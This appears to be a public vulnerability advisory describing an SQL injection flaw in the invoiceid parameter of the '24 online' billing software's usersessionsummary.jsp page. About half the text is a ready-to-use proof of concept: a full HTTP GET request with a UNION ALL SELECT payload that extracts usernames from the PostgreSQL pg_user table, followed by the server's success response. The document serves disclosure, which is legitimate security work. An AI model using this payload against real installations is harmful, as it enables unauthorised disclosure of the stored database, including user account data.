Software name: 24 online
Version: 8.3.6 build 9.0
Vendor website: http://24onlinebilling.com
Potentially others versions older than this are vulnerable too.
Vulnerability type: CWE-89: Improper Neutralization of Special Elements used in
an SQL Command ('SQL Injection')
The invoiceid GET parameter on <base
url>/24online/webpages/myaccount/usersessionsummary.jsp in not filtered
properly and leads to SQL Injection
Authentication Required: Yes
A non-privileged authenticated user can inject SQL commands on the
<base-url>/24online/webpages/myaccount/usersessionsummary.jsp?invoiceid=<numeric-id>
&fromdt=dd/mm/yyyy hh:mm:ss&todt= dd/mm/yyyy hh:mm:ss
There is complete informational disclosure over the stored database.
-----------------------------------
GET
/24online/webpages/myaccount/usersessionsummary.jsp?invoiceid=93043+UNION+ALL+SELECT+null,null,null,null,usename,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pg_user--+-&fromdt=06/05/2016%2019:37:44&todt=03/07/2016%2015:21:16
HTTP/1.1
Host: 10.100.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101
Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=5464B4DD2B003E1E73E34FF773CA7232; myaccountmenu_id=menu_5
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 03 Jul 2016 09:59:41 GMT
Server: Apache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1
